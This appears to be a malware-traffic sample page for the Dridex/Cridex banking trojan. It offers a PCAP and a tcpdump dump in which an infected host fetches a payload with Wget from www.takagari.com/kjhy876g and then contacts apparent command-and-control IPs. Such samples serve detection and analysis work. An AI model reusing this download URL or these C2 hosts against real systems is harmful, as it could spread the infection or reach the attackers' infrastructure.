Banking Trojan Malware Cridex Dridex PCAP file download traffic sample www.takagari.com/kjhy876g

Download Attachments

  • 1 pcap kjhy
    kjhy
    Date added: January 26, 2018 5:43 am Added by: admin File size: 18 KB Downloads: 85
47 engines detected this file
SHA-256 da135b38df8b6d87ecd98079b56eae725ae22e1846c14f4e0ed7a75a2290cdc8
File name output.112729552.txt
File size 148 KB
Last analysis 2018-01-24 11:48:36 UTC
Community score -229

 

 

2018-01-25 23:41:51.951964 IP 192.168.1.102.53269 > 69.163.163.39.80: Flags [P.], seq 145:294, ack 517, win 254, length 149: HTTP: GET /kjhy876g HTTP/1.1
E…..@…F{…fE..’…P..z.6…P…….GET /kjhy876g HTTP/1.1
User-Agent: Wget/1.19.4 (mingw32)
Accept: */*
Accept-Encoding: identity
Host: www.takagari.com
Connection: Keep-Alive

2018-01-25 23:42:27.263664 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [P.], seq 0:104, ack 1, win 256, length 104
E…#.@…K&…fEZ……yz.Y….P…e…….c…_..Zj…7&H..?.W……………BF……/.5…
….. .
.2.8…………………..
…………..
2018-01-25 23:42:27.356227 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [P.], seq 104:430, ack 1096, win 252, length 326
E..n#.@…JG…fEZ……yz…..#P….Y……………..j….B……….=S.@1..<…uS[.p[..Gqf’N
..J.7″+.s….aAUU_……M..”g..Ab…. ……>……!…../……S..R6..h…a…..b….%..M.PT..b\z.<}3….y..y.w.’k..4h….>*!..w.\..O..~…..!..Uy(…i……
..]4.q….E..SV….A….R……b…*’…& >.7……B……….0..Ws[/nH.i}….U.%x.8\2..”….9t.Q…..&…^AhN/
2018-01-25 23:42:27.493411 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [.], ack 1155, win 252, length 0
E..(#.@…K….fEZ……yz…..^P….V……..

2018-01-25 23:42:27.612023 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [P.], seq 4943:5304, ack 1155, win 252, length 361
E…#.@…J….fEZ……yz…..^P…”……..h..cr\…..l….>’..@……….p……,.-..|….R…Y|.~.!G a………….U2D$>….P.(7.?..,.O…tP.h.+?|.=..Z.7..5..%..?L….E. .H.I………….uMG..’|+kE..s.f..0..y.$….Q…-vy6i^}.^./.IBE…_…..O…’………..J…….Z.8….^^..-o7C$..@W.._.5IH@;.h>T….!…..9.E…0|..d=k@.X.q….d..Y,…….!.{….q..&xW.w…/..0m….h..E<.b..m’kV.Sw………..
2018-01-25 23:42:28.207936 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [.], ack 1369, win 251, length 0
E..(#.@…K….fEZ……yz…..4P….w……..
2018-01-25 23:42:28.209338 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [F.], seq 5304, ack 1369, win 251, length 0
E..(#.@…K….fEZ……yz…..4P….v……..
2018-01-25 23:42:45.981925 IP 192.168.1.102.60316 > 50.31.169.34.8253: UDP, length 20
E..0i…..3….f2..”.. =..<..|………..ip…..
2018-01-25 23:44:47.257224 IP 192.168.1.102.53273 > 89.171.146.30.4143: Flags [S], seq 833964971, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…IG…fY……/1.K………h……………
2018-01-25 23:44:47.896175 IP 192.168.1.102.53273 > 89.171.146.30.4143: Flags [S], seq 833964971, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…IF…fY……/1.K………h……………
2018-01-25 23:44:48.536919 IP 192.168.1.102.53273 > 89.171.146.30.4143: Flags [S], seq 833964971, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…IE…fY……/1.K………h……………
2018-01-25 23:44:49.181009 IP 192.168.1.102.53274 > 89.171.146.30.4143: Flags [S], seq 2126118763, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…ID…fY……/~..k……..g……………
2018-01-25 23:44:49.820453 IP 192.168.1.102.53274 > 89.171.146.30.4143: Flags [S], seq 2126118763, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…IC…fY……/~..k……..g……………
2018-01-25 23:44:50.461284 IP 192.168.1.102.53274 > 89.171.146.30.4143: Flags [S], seq 2126118763, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…IB…fY……/~..k……..g……………
2018-01-25 23:44:51.102432 IP 192.168.1.102.53275 > 89.171.146.30.4143: Flags [S], seq 1713330700, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…IA…fY……/f.Z………%……………
2018-01-25 23:44:51.742607 IP 192.168.1.102.53275 > 89.171.146.30.4143: Flags [S], seq 1713330700, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…I@…fY……/f.Z………%……………
2018-01-25 23:44:52.383317 IP 192.168.1.102.53275 > 89.171.146.30.4143: Flags [S], seq 1713330700, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…I?…fY……/f.Z………%……………
2018-01-25 23:46:53.547281 IP 192.168.1.102.53276 > 108.166.114.38.4443: Flags [S], seq 603444543, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.l@…K}…fl.r&…[#..?……………………
2018-01-25 23:46:53.607370 IP 192.168.1.102.53276 > 108.166.114.38.4443: Flags [.], ack 3889905833, win 256, length 0
E..(.m@…K….fl.r&…[#..@..@.P…
………
2018-01-25 23:46:53.614191 IP 192.168.1.102.53276 > 108.166.114.38.4443: Flags [P.], seq 0:104, ack 1, win 256, length 104
E….n@…K….fl.r&…[#..@..@.P…M…….c…_..Zj….
.’…#=….e.A.g…….m…../.5…
….. .
.2.8…………………..

Share

Leave a Reply